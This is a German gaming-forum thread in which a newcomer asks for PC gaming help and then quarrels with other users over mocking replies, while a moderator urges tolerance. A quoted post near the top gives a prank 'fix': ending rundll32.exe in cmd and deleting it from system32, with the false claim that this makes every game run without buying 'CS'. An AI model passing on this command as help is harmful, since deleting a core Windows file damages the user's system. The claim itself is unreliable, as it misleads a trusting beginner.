ich bin neu einsteiger und brauche hilfe
Moderatoren: Moderatoren, Redakteure
- MC Sahnetorte
- Persönliche Nachricht:
Axim92 hat geschrieben:Also du brauchst nicht für jedes Rollenspiel ein CS, aber bei gewissen kann es ganz hilfreich sein, weil sonst manchmal der Rundll abschmiert.
Wenn du dir allerdings kein CS leisten kannst (die kosten so um die 300 €) dann kannst du das Rundll auch beheben.
Klick dazu auf den Start-Button, dann auf "Ausführen" (bei Vista gib "Ausführen" ins Suchfeld ein) gib dort "cmd" ein und drück auf Enter.
Da gibst du dann folgendes ein: "taskkill /IM rundll32.exe" und drückst auf Enter, dann noch "del Windows.0\system32\rundll32.exe" und wieder Enter drücken.
All die Eingaben die ich dir beschriben habe bitte ohne die Anführungszeichen.
Wenn du das gemacht hast müsste jedes Spiel das es gibt bei dir laufen, auch ohne ein CS.
Viel Spass beim Gamen

-
- Persönliche Nachricht:
-
- Persönliche Nachricht:
ich kanns schon kaum abwarten,das wochen ende wil nicht kommen.Noobfried hat geschrieben:Naja wenn du mal Cs oder Css hast, können wir ja mal ne RUnde zocken
Aber dan ist es ja auch nicht 100% das es sofort geht.Aber die Hoffnung stirbt ja zuletzt.wenn es soweit is dan können wir auf jeden fall mal zocken.
-
- Persönliche Nachricht:
so ist das leben nun mal.wen einer am boden liegt helfen einige vieleicht,doch viehle treten noch drauf.So sind Menschen halt kann man nichts machen.Gönn denen etwas spass sonst haben sie warscheinlich nichts zu lachen im leben.egal.raver93 hat geschrieben:@xxGKxx: Aua meine Augen irgendwie tun die beim lesen deiner Posts weh^^
Sorry nimms nich persönlich, ok?
Und zu deinen Startschwierigkeiten das wird schon.
@Axim: Die Posts sind zwar böse, aber..........................![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
-
- Persönliche Nachricht:
Am Boden liegen und drauftreten ist glaub ich ein etwas krasser vergleich. Außerdem liegst du ja nicht wirklich am Boden.xxGKxx hat geschrieben:so ist das leben nun mal.wen einer am boden liegt helfen einige vieleicht,doch viehle treten noch drauf.So sind Menschen halt kann man nichts machen.Gönn denen etwas spass sonst haben sie warscheinlich nichts zu lachen im leben.egal.raver93 hat geschrieben:@xxGKxx: Aua meine Augen irgendwie tun die beim lesen deiner Posts weh^^
Sorry nimms nich persönlich, ok?
Und zu deinen Startschwierigkeiten das wird schon.
@Axim: Die Posts sind zwar böse, aber..........................![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
-
- Persönliche Nachricht:
du hast ja schon eine verwarnung die nächste wird bestimmt kommen.
wenn du keine ahnung hast frag, wen du ahnung hast teile dein wissen,aber schreibt kein dreck rein und vernichtet die seite.
Ich habs dem moderator schon mit geteilt die seite wird beobachtet also bitte nur schreiben wenn ihr euer wissen weitergeben wollt, und leuten wie mir helfen wollt,bitte keine weitere kindische bemerkungen abgeben.
DANKE
wenn du keine ahnung hast frag, wen du ahnung hast teile dein wissen,aber schreibt kein dreck rein und vernichtet die seite.
Ich habs dem moderator schon mit geteilt die seite wird beobachtet also bitte nur schreiben wenn ihr euer wissen weitergeben wollt, und leuten wie mir helfen wollt,bitte keine weitere kindische bemerkungen abgeben.
DANKE
-
- Persönliche Nachricht:
- Mr. B
- Persönliche Nachricht:
xxGKxx:
Versuche ein bisschen toleranter zu sein, das hier ist ein öffentliches Forum und solange niemand beleidigt wird, sind auch Kommentare erlaubt, die nur indirekt mit der Frage zu tun haben.
Immerhin verlangst du hier eine gratis Dienstleistung, also freue dich darüber wenn diese überhaupt geleistet wird
Versuche ein bisschen toleranter zu sein, das hier ist ein öffentliches Forum und solange niemand beleidigt wird, sind auch Kommentare erlaubt, die nur indirekt mit der Frage zu tun haben.
Immerhin verlangst du hier eine gratis Dienstleistung, also freue dich darüber wenn diese überhaupt geleistet wird

- Billie?
- Persönliche Nachricht:
xxGKxx hat geschrieben:teils teils hab deine frage erst jetz gesehen.Und übrigens sehe ich grad das du der jenige bist der damit angefangen hat dreck in die seite zu schreiben.Billie_the_man hat geschrieben:Ich weiß noch ob ich das so fragen darf^^. Aber bist du eigentlich Deutscher?
wie bitte? Ich habe dir doch nur den Rat gegeben, die Spiele lieber im Laden zu kaufen und okay ein Kommentar von mir war vielleicht nicht so nett, aber so jemanden wie dich haben viele hier auch noch nicht gesehen.
Und wenn man schon 28 Jahre alt ist, schon viele Spielerfahrung auf Konsolen gesammelt hat, aber dann einfach komischerweise, wie als wärst du 20 Jahre im Koma gewesen, überhaupt keine Ahnung hat, dann muss man damit klar kommen, dass einige hier den einen oder anderen blöden Kommentar abgeben. Achja und Dreck schreib ich hier ganz bestimmt nicht rein. Ich war der Erste hier, der dich zu ein paar Seiten verlinkt hat, wo du Spiele downloaden kannst. Bitte ein wenig mehr Respekt.
-
- Persönliche Nachricht:
xbox ps2 haben was gemeinsam,aber was haben die spiel erfahrungen von den konsolen mit dem Pc kentnissen gemeinsam.ich habe kein intresse an einem PC gehabt und bin ein neu einsteiger das hat mit dem alter nichts zu tuen erstens.Zweitens mann lernt mit jedem alter immer wieder was dazu,
mann lernt niiie aus.
ich habe vieleicht keine ahnung von spielen am Pc aber dafür mehr ahnung über andere wichtigen sachen was so alles geht am PC.
ich hab die bemerkung schon auf seite 1 oder 2 gemacht das ich auch bei anderen themen helfen kann,alles beruht sich auf gegenseitigkeit.Also respect habe ich zu Leuten die wo wirklich nützliche infos geben und anstand besitzen mit denen man auch privat mal was schreiben kann und infos austauschen,doch bei dir nicht.
Laut deinem komentar bist du bestimt gerademal 16 geworden oder so in etwa.und bist bestimt irgendwie in der schule gehenselt worden so das jetzt hier ein ausgleich suchst.Denn "Reif" bist du auf keinen fall.
mann lernt niiie aus.
ich habe vieleicht keine ahnung von spielen am Pc aber dafür mehr ahnung über andere wichtigen sachen was so alles geht am PC.
ich hab die bemerkung schon auf seite 1 oder 2 gemacht das ich auch bei anderen themen helfen kann,alles beruht sich auf gegenseitigkeit.Also respect habe ich zu Leuten die wo wirklich nützliche infos geben und anstand besitzen mit denen man auch privat mal was schreiben kann und infos austauschen,doch bei dir nicht.
Laut deinem komentar bist du bestimt gerademal 16 geworden oder so in etwa.und bist bestimt irgendwie in der schule gehenselt worden so das jetzt hier ein ausgleich suchst.Denn "Reif" bist du auf keinen fall.
- Billie?
- Persönliche Nachricht:
xxGKxx hat geschrieben:xbox ps2 haben was gemeinsam,aber was haben die spiel erfahrungen von den konsolen mit dem Pc kentnissen gemeinsam.ich habe kein intresse an einem PC gehabt und bin ein neu einsteiger das hat mit dem alter nichts zu tuen erstens.Zweitens mann lernt mit jedem alter immer wieder was dazu,
mann lernt niiie aus.
Ich bin noch keine 16, aber ich weiß, dass wenn mir Leute helfen wollen, ich ihnen nicht Gründe gebe, sich das anders zu überlegen.
Ich bin raus ...
-
- Persönliche Nachricht:
Billie_the_man hat geschrieben:xxGKxx hat geschrieben:xbox ps2 haben was gemeinsam,aber was haben die spiel erfahrungen von den konsolen mit dem Pc kentnissen gemeinsam.ich habe kein intresse an einem PC gehabt und bin ein neu einsteiger das hat mit dem alter nichts zu tuen erstens.Zweitens mann lernt mit jedem alter immer wieder was dazu,
mann lernt niiie aus.
Ich bin noch keine 16, aber ich weiß, dass wenn mir Leute helfen wollen, ich ihnen nicht Gründe gebe, sich das anders zu überlegen.
danke das raus bist, also auf deine komentare kann ich verzichten.